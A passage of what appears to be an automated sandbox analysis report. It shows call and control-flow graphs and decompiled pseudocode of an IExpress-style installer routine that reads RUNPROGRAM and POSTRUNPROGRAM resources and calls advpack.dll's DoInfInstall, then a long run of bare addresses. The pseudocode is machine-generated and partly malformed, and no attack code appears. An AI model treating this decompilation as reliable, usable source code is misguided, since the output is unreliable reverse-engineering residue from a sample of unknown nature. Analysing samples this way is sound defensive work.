3251->3252 3252->3248 3253->3248 3253->3249 3254 394bc0 3255 394bd7 3254->3255 3257 394c05 3254->3257 3256 394c1b SetFilePointer 3256->3255 3257->3255 3257->3256 3258 3930c0 3259 3930de CallWindowProcA 3258->3259 3260 3930ce 3258->3260 3261 3930da 3259->3261 3260->3259 3260->3261 3262 3963c0 3263 396407 3262->3263 3264 39658a CharPrevA 3263->3264 3265 396415 CreateFileA 3264->3265 3266 396448 WriteFile 3265->3266 3267 39643a 3265->3267 3268 396465 CloseHandle 3266->3268 3270 396ce0 4 API calls 3267->3270 3268->3267 3271 39648f 3270->3271 3272 396c03 3273 396c1e 3272->3273 3274 396c17 _exit 3272->3274 3275 396c27 _cexit 3273->3275 3276 396c32 3273->3276 3274->3273 3275->3276

                                                                                                                                                                                                    Callgraph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    • Opacity -> Relevance
                                                                                                                                                                                                    • Disassembly available
                                                                                                                                                                                                    callgraph 0 Function_00393A3F 18 Function_00396517 0->18 50 Function_003944B9 0->50 77 Function_0039468F 0->77 83 Function_00396285 0->83 1 Function_00396C3F 2 Function_00392630 2->50 104 Function_00396CE0 2->104 3 Function_00394C37 4 Function_00396E2A 89 Function_00396CF0 4->89 5 Function_0039202A 13 Function_0039171E 5->13 5->50 76 Function_0039658A 5->76 5->104 6 Function_00397120 7 Function_00396A20 8 Function_00394224 8->50 80 Function_00391680 8->80 9 Function_00393B26 9->18 68 Function_00396298 9->68 102 Function_00394FE0 9->102 10 Function_0039411B 66 Function_00391EA7 10->66 11 Function_00392F1D 11->0 11->9 14 Function_0039621E 11->14 32 Function_00394169 11->32 33 Function_0039256D 11->33 39 Function_00395164 11->39 11->50 60 Function_003955A0 11->60 63 Function_00393BA2 11->63 11->76 11->83 11->104 108 Function_003951E5 11->108 12 Function_0039681F 85 Function_003966F9 12->85 12->104 27 Function_0039597D 14->27 14->50 14->83 14->104 15 Function_00393210 15->8 15->27 15->50 15->76 111 Function_003943D0 15->111 113 Function_003958C8 15->113 16 Function_00397010 17 Function_00395C17 18->50 19 Function_00397208 20 Function_0039490C 21 Function_00397000 22 Function_00394200 23 Function_00393100 23->111 24 Function_00396C03 48 Function_0039724D 24->48 25 Function_00394702 53 Function_003916B3 25->53 25->80 26 Function_0039487A 26->20 27->50 75 Function_0039268B 27->75 27->83 27->104 28 Function_0039667F 47 Function_00396648 28->47 29 Function_00397270 30 Function_00396C70 31 Function_00392773 31->76 78 Function_00391781 31->78 31->80 31->104 32->50 32->77 105 Function_003924E0 33->105 34 Function_0039476D 34->18 57 Function_003966AE 34->57 35 Function_00396A60 35->1 35->19 37 Function_00397060 35->37 45 Function_00397155 35->45 35->48 86 Function_00392BFB 35->86 36 Function_00394B60 37->6 37->16 38 Function_00396760 39->50 39->68 39->77 40 Function_00395467 40->27 58 Function_003953A1 40->58 40->76 40->78 40->80 40->83 40->104 40->113 41 Function_00392267 41->13 41->76 41->104 42 Function_00394A50 43 Function_00393450 43->111 44 Function_00396952 46 Function_00396F54 46->19 46->48 49 Function_00396F40 50->12 50->13 50->80 50->104 112 Function_003967C9 50->112 51 Function_00396FBE 51->46 52 Function_003969B0 52->21 52->30 52->51 97 Function_003971EF 52->97 53->78 54 Function_003952B6 70 Function_00392390 54->70 54->78 94 Function_003965E8 54->94 101 Function_00391FE1 54->101 54->104 55 Function_00392CAA 55->18 55->50 62 Function_003918A3 55->62 69 Function_00395C9E 55->69 55->70 55->77 99 Function_003936EE 55->99 55->104 56 Function_00392AAC 56->80 56->94 56->104 115 Function_003917C8 56->115 58->13 58->76 58->80 58->104 59 Function_00396FA1 60->2 60->18 60->27 60->40 60->44 60->50 60->76 60->77 60->78 60->83 60->104 61 Function_00394CA0 100 Function_003917EE 62->100 62->104 63->5 63->41 63->50 73 Function_00396495 63->73 63->77 63->78 63->83 92 Function_00391AE8 63->92 96 Function_00393FEF 63->96 63->104 64 Function_003972A2 65 Function_00396FA5 65->48 66->33 67 Function_00394E99 67->80 68->13 68->104 69->4 69->17 69->28 69->50 69->76 69->80 103 Function_003931E0 69->103 69->104 114 Function_003966C8 69->114 70->53 70->70 70->76 70->80 70->104 71 Function_00391F90 71->50 71->66 71->104 72 Function_00396793 73->76 73->78 73->104 74 Function_00392A89 75->13 75->50 75->104 76->53 79 Function_00394980 79->26 79->50 80->78 81 Function_00393680 82 Function_00396380 84 Function_00391A84 84->28 86->11 86->54 86->55 86->71 87 Function_00394EFD 87->36 87->79 87->104 88 Function_003970FE 90 Function_003934F0 90->50 90->81 90->111 91 Function_00396EF0 92->13 92->50 92->53 92->56 92->76 92->78 92->80 92->84 92->104 92->114 93 Function_003928E8 93->31 93->74 95 Function_003970EB 96->10 96->50 96->83 96->104 98 Function_00396BEF 99->12 99->50 99->74 99->93 99->104 99->112 100->104 102->50 102->77 102->87 104->89 105->76 105->104 106 Function_003919E0 106->104 106->111 107 Function_003947E0 107->50 107->80 108->50 108->77 108->83 109 Function_00394AD0 109->81 110 Function_00394CD0 110->3 110->25 110->34 110->36 110->67 110->79 110->104 110->107 111->104 112->72 113->50 113->76 113->80 113->83 114->47 116 Function_00394CC0 117 Function_00394BC0 118 Function_003930C0 119 Function_003963C0 119->76 119->78 119->104

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 36 393ba2-393bd9 37 393bdb-393bee call 39468f 36->37 38 393bfd-393bff 36->38 44 393d13-393d30 call 3944b9 37->44 45 393bf4-393bf7 37->45 40 393c03-393c28 memset 38->40 42 393c2e-393c40 call 39468f 40->42 43 393d35-393d48 call 391781 40->43 42->44 54 393c46-393c49 42->54 49 393d4d-393d52 43->49 57 393f4d 44->57 45->38 45->44 52 393d9e-393db6 call 391ae8 49->52 53 393d54-393d6c call 39468f 49->53 52->57 67 393dbc-393dc2 52->67 53->44 69 393d6e-393d75 53->69 54->44 55 393c4f-393c56 54->55 59 393c58-393c5e 55->59 60 393c60-393c65 55->60 62 393f4f-393f63 call 396ce0 57->62 64 393c6e-393c73 59->64 65 393c75-393c7c 60->65 66 393c67-393c6d 60->66 72 393c87-393c89 64->72 65->72 75 393c7e-393c82 65->75 66->64 73 393dc4-393dce 67->73 74 393de6-393de8 67->74 70 393d7b-393d98 CompareStringA 69->70 71 393fda-393fe1 69->71 70->52 70->71 81 393fe8-393fea 71->81 82 393fe3 call 392267 71->82 72->49 78 393c8f-393c98 72->78 73->74 77 393dd0-393dd7 73->77 79 393f0b-393f15 call 393fef 74->79 80 393dee-393df5 74->80 75->72 77->74 84 393dd9-393ddb 77->84 85 393c9a-393c9c 78->85 86 393cf1-393cf3 78->86 91 393f1a-393f1c 79->91 87 393fab-393fd2 call 3944b9 LocalFree 80->87 88 393dfb-393dfd 80->88 81->62 82->81 84->80 92 393ddd-393de1 call 39202a 84->92 94 393c9e-393ca3 85->94 95 393ca5-393ca7 85->95 86->52 90 393cf9-393d11 call 39468f 86->90 87->57 88->79 96 393e03-393e0a 88->96 90->44 90->49 98 393f1e-393f2d LocalFree 91->98 99 393f46-393f47 LocalFree 91->99 92->74 102 393cb2-393cc5 call 39468f 94->102 95->57 103 393cad 95->103 96->79 104 393e10-393e19 call 396495 96->104 106 393f33-393f3b 98->106 107 393fd7-393fd9 98->107 99->57 102->44 112 393cc7-393ce8 CompareStringA 102->112 103->102 113 393e1f-393e36 GetProcAddress 104->113 114 393f92-393fa9 call 3944b9 104->114 106->40 107->71 112->86 115 393cea-393ced 112->115 116 393e3c-393e80 113->116 117 393f64-393f76 call 3944b9 FreeLibrary 113->117 126 393f7c-393f90 LocalFree call 396285 114->126 115->86 120 393e8b-393e94 116->120 121 393e82-393e87 116->121 117->126 124 393e9f-393ea2 120->124 125 393e96-393e9b 120->125 121->120 128 393ead-393eb6 124->128 129 393ea4-393ea9 124->129 125->124 126->57 131 393eb8-393ebd 128->131 132 393ec1-393ec3 128->132 129->128 131->132 133 393ece-393eec 132->133 134 393ec5-393eca 132->134 137 393eee-393ef3 133->137 138 393ef5-393efd 133->138 134->133 137->138 139 393eff-393f09 FreeLibrary 138->139 140 393f40 FreeLibrary 138->140 139->98 140->99
                                                                                                                                                                                                    C-Code - Quality: 82%
                                                                                                                                                                                                    			E00393BA2() {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                                                    				char _v276;
                                                                                                                                                                                                    				char _v280;
                                                                                                                                                                                                    				short _v300;
                                                                                                                                                                                                    				intOrPtr _v304;
                                                                                                                                                                                                    				void _v348;
                                                                                                                                                                                                    				char _v352;
                                                                                                                                                                                                    				intOrPtr _v356;
                                                                                                                                                                                                    				signed int _v360;
                                                                                                                                                                                                    				short _v364;
                                                                                                                                                                                                    				char* _v368;
                                                                                                                                                                                                    				intOrPtr _v372;
                                                                                                                                                                                                    				void* _v376;
                                                                                                                                                                                                    				intOrPtr _v380;
                                                                                                                                                                                                    				char _v384;
                                                                                                                                                                                                    				signed int _v388;
                                                                                                                                                                                                    				intOrPtr _v392;
                                                                                                                                                                                                    				signed int _v396;
                                                                                                                                                                                                    				signed int _v400;
                                                                                                                                                                                                    				signed int _v404;
                                                                                                                                                                                                    				void* _v408;
                                                                                                                                                                                                    				void* _v424;
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				signed int _t69;
                                                                                                                                                                                                    				signed int _t76;
                                                                                                                                                                                                    				void* _t77;
                                                                                                                                                                                                    				signed int _t79;
                                                                                                                                                                                                    				short _t96;
                                                                                                                                                                                                    				signed int _t97;
                                                                                                                                                                                                    				intOrPtr _t98;
                                                                                                                                                                                                    				signed int _t101;
                                                                                                                                                                                                    				signed int _t104;
                                                                                                                                                                                                    				signed int _t108;
                                                                                                                                                                                                    				int _t112;
                                                                                                                                                                                                    				void* _t115;
                                                                                                                                                                                                    				signed char _t118;
                                                                                                                                                                                                    				void* _t125;
                                                                                                                                                                                                    				signed int _t127;
                                                                                                                                                                                                    				void* _t128;
                                                                                                                                                                                                    				struct HINSTANCE__* _t129;
                                                                                                                                                                                                    				void* _t130;
                                                                                                                                                                                                    				short _t137;
                                                                                                                                                                                                    				char* _t140;
                                                                                                                                                                                                    				signed char _t144;
                                                                                                                                                                                                    				signed char _t145;
                                                                                                                                                                                                    				signed int _t149;
                                                                                                                                                                                                    				void* _t150;
                                                                                                                                                                                                    				void* _t151;
                                                                                                                                                                                                    				signed int _t153;
                                                                                                                                                                                                    				void* _t155;
                                                                                                                                                                                                    				void* _t156;
                                                                                                                                                                                                    				signed int _t157;
                                                                                                                                                                                                    				signed int _t162;
                                                                                                                                                                                                    				signed int _t164;
                                                                                                                                                                                                    				void* _t165;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t164 = (_t162 & 0xfffffff8) - 0x194;
                                                                                                                                                                                                    				_t69 =  *0x398004; // 0x74c05eb4
                                                                                                                                                                                                    				_v8 = _t69 ^ _t164;
                                                                                                                                                                                                    				_t153 = 0;
                                                                                                                                                                                                    				 *0x399124 =  *0x399124 & 0;
                                                                                                                                                                                                    				_t149 = 0;
                                                                                                                                                                                                    				_v388 = 0;
                                                                                                                                                                                                    				_v384 = 0;
                                                                                                                                                                                                    				_t165 =  *0x398a28 - _t153; // 0x0
                                                                                                                                                                                                    				if(_t165 != 0) {
                                                                                                                                                                                                    					L3:
                                                                                                                                                                                                    					_t127 = 0;
                                                                                                                                                                                                    					_v392 = 0;
                                                                                                                                                                                                    					while(1) {
                                                                                                                                                                                                    						_v400 = _v400 & 0x00000000;
                                                                                                                                                                                                    						memset( &_v348, 0, 0x44);
                                                                                                                                                                                                    						_t164 = _t164 + 0xc;
                                                                                                                                                                                                    						_v348 = 0x44;
                                                                                                                                                                                                    						if( *0x398c42 != 0) {
                                                                                                                                                                                                    							goto L26;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t146 =  &_v396;
                                                                                                                                                                                                    						_t115 = E0039468F("SHOWWINDOW",  &_v396, 4);
                                                                                                                                                                                                    						if(_t115 == 0 || _t115 > 4) {
                                                                                                                                                                                                    							L25:
                                                                                                                                                                                                    							_t146 = 0x4b1;
                                                                                                                                                                                                    							E003944B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                    							 *0x399124 = 0x80070714;
                                                                                                                                                                                                    							goto L62;
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							if(_v396 != 1) {
                                                                                                                                                                                                    								__eflags = _v396 - 2;
                                                                                                                                                                                                    								if(_v396 != 2) {
                                                                                                                                                                                                    									_t137 = 3;
                                                                                                                                                                                                    									__eflags = _v396 - _t137;
                                                                                                                                                                                                    									if(_v396 == _t137) {
                                                                                                                                                                                                    										_v304 = 1;
                                                                                                                                                                                                    										_v300 = _t137;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									goto L14;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								_push(6);
                                                                                                                                                                                                    								_v304 = 1;
                                                                                                                                                                                                    								_pop(0);
                                                                                                                                                                                                    								goto L11;
                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                    								_v304 = 1;
                                                                                                                                                                                                    								L11:
                                                                                                                                                                                                    								_v300 = 0;
                                                                                                                                                                                                    								L14:
                                                                                                                                                                                                    								if(_t127 != 0) {
                                                                                                                                                                                                    									L27:
                                                                                                                                                                                                    									_t155 = 1;
                                                                                                                                                                                                    									__eflags = _t127 - 1;
                                                                                                                                                                                                    									if(_t127 != 1) {
                                                                                                                                                                                                    										L31:
                                                                                                                                                                                                    										_t132 =  &_v280;
                                                                                                                                                                                                    										_t76 = E00391AE8( &_v280,  &_v408,  &_v404); // executed
                                                                                                                                                                                                    										__eflags = _t76;
                                                                                                                                                                                                    										if(_t76 == 0) {
                                                                                                                                                                                                    											L62:
                                                                                                                                                                                                    											_t77 = 0;
                                                                                                                                                                                                    											L63:
                                                                                                                                                                                                    											_pop(_t150);
                                                                                                                                                                                                    											_pop(_t156);
                                                                                                                                                                                                    											_pop(_t128);
                                                                                                                                                                                                    											return E00396CE0(_t77, _t128, _v12 ^ _t164, _t146, _t150, _t156);
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    										_t157 = _v404;
                                                                                                                                                                                                    										__eflags = _t149;
                                                                                                                                                                                                    										if(_t149 != 0) {
                                                                                                                                                                                                    											L37:
                                                                                                                                                                                                    											__eflags = _t157;
                                                                                                                                                                                                    											if(_t157 == 0) {
                                                                                                                                                                                                    												L57:
                                                                                                                                                                                                    												_t151 = _v408;
                                                                                                                                                                                                    												_t146 =  &_v352;
                                                                                                                                                                                                    												_t130 = _t151; // executed
                                                                                                                                                                                                    												_t79 = E00393FEF(_t130,  &_v352); // executed
                                                                                                                                                                                                    												__eflags = _t79;
                                                                                                                                                                                                    												if(_t79 == 0) {
                                                                                                                                                                                                    													L61:
                                                                                                                                                                                                    													LocalFree(_t151);
                                                                                                                                                                                                    													goto L62;
                                                                                                                                                                                                    												}
                                                                                                                                                                                                    												L58:
                                                                                                                                                                                                    												LocalFree(_t151);
                                                                                                                                                                                                    												_t127 = _t127 + 1;
                                                                                                                                                                                                    												_v396 = _t127;
                                                                                                                                                                                                    												__eflags = _t127 - 2;
                                                                                                                                                                                                    												if(_t127 >= 2) {
                                                                                                                                                                                                    													_t155 = 1;
                                                                                                                                                                                                    													__eflags = 1;
                                                                                                                                                                                                    													L69:
                                                                                                                                                                                                    													__eflags =  *0x398580;
                                                                                                                                                                                                    													if( *0x398580 != 0) {
                                                                                                                                                                                                    														E00392267();
                                                                                                                                                                                                    													}
                                                                                                                                                                                                    													_t77 = _t155;
                                                                                                                                                                                                    													goto L63;
                                                                                                                                                                                                    												}
                                                                                                                                                                                                    												_t153 = _v392;
                                                                                                                                                                                                    												_t149 = _v388;
                                                                                                                                                                                                    												continue;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    											L38:
                                                                                                                                                                                                    											__eflags =  *0x398180;
                                                                                                                                                                                                    											if( *0x398180 == 0) {
                                                                                                                                                                                                    												_t146 = 0x4c7;
                                                                                                                                                                                                    												E003944B9(0, 0x4c7, 0, 0, 0x10, 0);
                                                                                                                                                                                                    												LocalFree(_v424);
                                                                                                                                                                                                    												 *0x399124 = 0x8007042b;
                                                                                                                                                                                                    												goto L62;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    											__eflags = _t157;
                                                                                                                                                                                                    											if(_t157 == 0) {
                                                                                                                                                                                                    												goto L57;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    											__eflags =  *0x399a34 & 0x00000004;
                                                                                                                                                                                                    											if(__eflags == 0) {
                                                                                                                                                                                                    												goto L57;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    											_t129 = E00396495(_t127, _t132, _t157, __eflags);
                                                                                                                                                                                                    											__eflags = _t129;
                                                                                                                                                                                                    											if(_t129 == 0) {
                                                                                                                                                                                                    												_t146 = 0x4c8;
                                                                                                                                                                                                    												E003944B9(0, 0x4c8, "advpack.dll", 0, 0x10, 0);
                                                                                                                                                                                                    												L65:
                                                                                                                                                                                                    												LocalFree(_v408);
                                                                                                                                                                                                    												 *0x399124 = E00396285();
                                                                                                                                                                                                    												goto L62;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    											_t146 = GetProcAddress(_t129, "DoInfInstall");
                                                                                                                                                                                                    											_v404 = _t146;
                                                                                                                                                                                                    											__eflags = _t146;
                                                                                                                                                                                                    											if(_t146 == 0) {
                                                                                                                                                                                                    												_t146 = 0x4c9;
                                                                                                                                                                                                    												__eflags = 0;
                                                                                                                                                                                                    												E003944B9(0, 0x4c9, "DoInfInstall", 0, 0x10, 0);
                                                                                                                                                                                                    												FreeLibrary(_t129);
                                                                                                                                                                                                    												goto L65;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    											__eflags =  *0x398a30;
                                                                                                                                                                                                    											_t151 = _v408;
                                                                                                                                                                                                    											_v384 = 0;
                                                                                                                                                                                                    											_v368 =  &_v280;
                                                                                                                                                                                                    											_t96 =  *0x399a40; // 0x3
                                                                                                                                                                                                    											_v364 = _t96;
                                                                                                                                                                                                    											_t97 =  *0x398a38 & 0x0000ffff;
                                                                                                                                                                                                    											_v380 = 0x399154;
                                                                                                                                                                                                    											_v376 = _t151;
                                                                                                                                                                                                    											_v372 = 0x3991e4;
                                                                                                                                                                                                    											_v360 = _t97;
                                                                                                                                                                                                    											if( *0x398a30 != 0) {
                                                                                                                                                                                                    												_t97 = _t97 | 0x00010000;
                                                                                                                                                                                                    												__eflags = _t97;
                                                                                                                                                                                                    												_v360 = _t97;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    											_t144 =  *0x399a34; // 0x1
                                                                                                                                                                                                    											__eflags = _t144 & 0x00000008;
                                                                                                                                                                                                    											if((_t144 & 0x00000008) != 0) {
                                                                                                                                                                                                    												_t97 = _t97 | 0x00020000;
                                                                                                                                                                                                    												__eflags = _t97;
                                                                                                                                                                                                    												_v360 = _t97;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    											__eflags = _t144 & 0x00000010;
                                                                                                                                                                                                    											if((_t144 & 0x00000010) != 0) {
                                                                                                                                                                                                    												_t97 = _t97 | 0x00040000;
                                                                                                                                                                                                    												__eflags = _t97;
                                                                                                                                                                                                    												_v360 = _t97;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    											_t145 =  *0x398d48; // 0x0
                                                                                                                                                                                                    											__eflags = _t145 & 0x00000040;
                                                                                                                                                                                                    											if((_t145 & 0x00000040) != 0) {
                                                                                                                                                                                                    												_t97 = _t97 | 0x00080000;
                                                                                                                                                                                                    												__eflags = _t97;
                                                                                                                                                                                                    												_v360 = _t97;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    											__eflags = _t145;
                                                                                                                                                                                                    											if(_t145 < 0) {
                                                                                                                                                                                                    												_t104 = _t97 | 0x00100000;
                                                                                                                                                                                                    												__eflags = _t104;
                                                                                                                                                                                                    												_v360 = _t104;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    											_t98 =  *0x399a38; // 0x0
                                                                                                                                                                                                    											_v356 = _t98;
                                                                                                                                                                                                    											_t130 = _t146;
                                                                                                                                                                                                    											 *0x39a288( &_v384);
                                                                                                                                                                                                    											_t101 = _v404();
                                                                                                                                                                                                    											__eflags = _t164 - _t164;
                                                                                                                                                                                                    											if(_t164 != _t164) {
                                                                                                                                                                                                    												_t130 = 4;
                                                                                                                                                                                                    												asm("int 0x29");
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    											 *0x399124 = _t101;
                                                                                                                                                                                                    											_push(_t129);
                                                                                                                                                                                                    											__eflags = _t101;
                                                                                                                                                                                                    											if(_t101 < 0) {
                                                                                                                                                                                                    												FreeLibrary();
                                                                                                                                                                                                    												goto L61;
                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                    												FreeLibrary();
                                                                                                                                                                                                    												_t127 = _v400;
                                                                                                                                                                                                    												goto L58;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    										__eflags =  *0x399a40 - 1; // 0x3
                                                                                                                                                                                                    										if(__eflags == 0) {
                                                                                                                                                                                                    											goto L37;
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    										__eflags =  *0x398a20;
                                                                                                                                                                                                    										if( *0x398a20 == 0) {
                                                                                                                                                                                                    											goto L37;
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    										__eflags = _t157;
                                                                                                                                                                                                    										if(_t157 != 0) {
                                                                                                                                                                                                    											goto L38;
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    										_v388 = 1;
                                                                                                                                                                                                    										E0039202A(_t146); // executed
                                                                                                                                                                                                    										goto L37;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									_t146 =  &_v280;
                                                                                                                                                                                                    									_t108 = E0039468F("POSTRUNPROGRAM",  &_v280, 0x104);
                                                                                                                                                                                                    									__eflags = _t108;
                                                                                                                                                                                                    									if(_t108 == 0) {
                                                                                                                                                                                                    										goto L25;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									__eflags =  *0x398c42;
                                                                                                                                                                                                    									if( *0x398c42 != 0) {
                                                                                                                                                                                                    										goto L69;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									_t112 = CompareStringA(0x7f, 1,  &_v280, 0xffffffff, "<None>", 0xffffffff);
                                                                                                                                                                                                    									__eflags = _t112 == 0;
                                                                                                                                                                                                    									if(_t112 == 0) {
                                                                                                                                                                                                    										goto L69;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									goto L31;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								_t118 =  *0x398a38; // 0x0
                                                                                                                                                                                                    								if(_t118 == 0) {
                                                                                                                                                                                                    									L23:
                                                                                                                                                                                                    									if(_t153 != 0) {
                                                                                                                                                                                                    										goto L31;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									_t146 =  &_v276;
                                                                                                                                                                                                    									if(E0039468F("RUNPROGRAM",  &_v276, 0x104) != 0) {
                                                                                                                                                                                                    										goto L27;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									goto L25;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								if((_t118 & 0x00000001) == 0) {
                                                                                                                                                                                                    									__eflags = _t118 & 0x00000002;
                                                                                                                                                                                                    									if((_t118 & 0x00000002) == 0) {
                                                                                                                                                                                                    										goto L62;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									_t140 = "USRQCMD";
                                                                                                                                                                                                    									L20:
                                                                                                                                                                                                    									_t146 =  &_v276;
                                                                                                                                                                                                    									if(E0039468F(_t140,  &_v276, 0x104) == 0) {
                                                                                                                                                                                                    										goto L25;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									if(CompareStringA(0x7f, 1,  &_v276, 0xffffffff, "<None>", 0xffffffff) - 2 != 0xfffffffe) {
                                                                                                                                                                                                    										_t153 = 1;
                                                                                                                                                                                                    										_v388 = 1;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									goto L23;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								_t140 = "ADMQCMD";
                                                                                                                                                                                                    								goto L20;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						L26:
                                                                                                                                                                                                    						_push(_t130);
                                                                                                                                                                                                    						_t146 = 0x104;
                                                                                                                                                                                                    						E00391781( &_v276, 0x104, _t130, 0x398c42);
                                                                                                                                                                                                    						goto L27;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t130 = "REBOOT";
                                                                                                                                                                                                    				_t125 = E0039468F(_t130, 0x399a2c, 4);
                                                                                                                                                                                                    				if(_t125 == 0 || _t125 > 4) {
                                                                                                                                                                                                    					goto L25;
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					goto L3;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    			}





























































                                                                                                                                                                                                    0x00393baa
                                                                                                                                                                                                    0x00393bb0
                                                                                                                                                                                                    0x00393bb7
                                                                                                                                                                                                    0x00393bc0
                                                                                                                                                                                                    0x00393bc2
                                                                                                                                                                                                    0x00393bc9
                                                                                                                                                                                                    0x00393bcb
                                                                                                                                                                                                    0x00393bcf
                                                                                                                                                                                                    0x00393bd3
                                                                                                                                                                                                    0x00393bd9
                                                                                                                                                                                                    0x00393bfd
                                                                                                                                                                                                    0x00393bfd
                                                                                                                                                                                                    0x00393bff
                                                                                                                                                                                                    0x00393c03
                                                                                                                                                                                                    0x00393c03
                                                                                                                                                                                                    0x00393c11
                                                                                                                                                                                                    0x00393c16
                                                                                                                                                                                                    0x00393c19
                                                                                                                                                                                                    0x00393c28
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00393c30
                                                                                                                                                                                                    0x00393c39
                                                                                                                                                                                                    0x00393c40
                                                                                                                                                                                                    0x00393d13
                                                                                                                                                                                                    0x00393d15
                                                                                                                                                                                                    0x00393d21
                                                                                                                                                                                                    0x00393d26
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00393c4f
                                                                                                                                                                                                    0x00393c56
                                                                                                                                                                                                    0x00393c60
                                                                                                                                                                                                    0x00393c65
                                                                                                                                                                                                    0x00393c77
                                                                                                                                                                                                    0x00393c78
                                                                                                                                                                                                    0x00393c7c
                                                                                                                                                                                                    0x00393c7e
                                                                                                                                                                                                    0x00393c82
                                                                                                                                                                                                    0x00393c82
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00393c7c
                                                                                                                                                                                                    0x00393c67
                                                                                                                                                                                                    0x00393c69
                                                                                                                                                                                                    0x00393c6d
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00393c58
                                                                                                                                                                                                    0x00393c58
                                                                                                                                                                                                    0x00393c6e
                                                                                                                                                                                                    0x00393c6e
                                                                                                                                                                                                    0x00393c87
                                                                                                                                                                                                    0x00393c89
                                                                                                                                                                                                    0x00393d4d
                                                                                                                                                                                                    0x00393d4f
                                                                                                                                                                                                    0x00393d50
                                                                                                                                                                                                    0x00393d52
                                                                                                                                                                                                    0x00393d9e
                                                                                                                                                                                                    0x00393da8
                                                                                                                                                                                                    0x00393daf
                                                                                                                                                                                                    0x00393db4
                                                                                                                                                                                                    0x00393db6
                                                                                                                                                                                                    0x00393f4d
                                                                                                                                                                                                    0x00393f4d
                                                                                                                                                                                                    0x00393f4f
                                                                                                                                                                                                    0x00393f56
                                                                                                                                                                                                    0x00393f57
                                                                                                                                                                                                    0x00393f58
                                                                                                                                                                                                    0x00393f63
                                                                                                                                                                                                    0x00393f63
                                                                                                                                                                                                    0x00393dbc
                                                                                                                                                                                                    0x00393dc0
                                                                                                                                                                                                    0x00393dc2
                                                                                                                                                                                                    0x00393de6
                                                                                                                                                                                                    0x00393de6
                                                                                                                                                                                                    0x00393de8
                                                                                                                                                                                                    0x00393f0b
                                                                                                                                                                                                    0x00393f0b
                                                                                                                                                                                                    0x00393f0f
                                                                                                                                                                                                    0x00393f13
                                                                                                                                                                                                    0x00393f15
                                                                                                                                                                                                    0x00393f1a
                                                                                                                                                                                                    0x00393f1c
                                                                                                                                                                                                    0x00393f46
                                                                                                                                                                                                    0x00393f47
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00393f47
                                                                                                                                                                                                    0x00393f1e
                                                                                                                                                                                                    0x00393f1f
                                                                                                                                                                                                    0x00393f25
                                                                                                                                                                                                    0x00393f26
                                                                                                                                                                                                    0x00393f2a
                                                                                                                                                                                                    0x00393f2d
                                                                                                                                                                                                    0x00393fd9
                                                                                                                                                                                                    0x00393fd9
                                                                                                                                                                                                    0x00393fda
                                                                                                                                                                                                    0x00393fda
                                                                                                                                                                                                    0x00393fe1
                                                                                                                                                                                                    0x00393fe3
                                                                                                                                                                                                    0x00393fe3
                                                                                                                                                                                                    0x00393fe8
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00393fe8
                                                                                                                                                                                                    0x00393f33
                                                                                                                                                                                                    0x00393f37
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00393f37
                                                                                                                                                                                                    0x00393dee
                                                                                                                                                                                                    0x00393dee
                                                                                                                                                                                                    0x00393df5
                                                                                                                                                                                                    0x00393fad
                                                                                                                                                                                                    0x00393fb9
                                                                                                                                                                                                    0x00393fc2
                                                                                                                                                                                                    0x00393fc8
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00393fc8
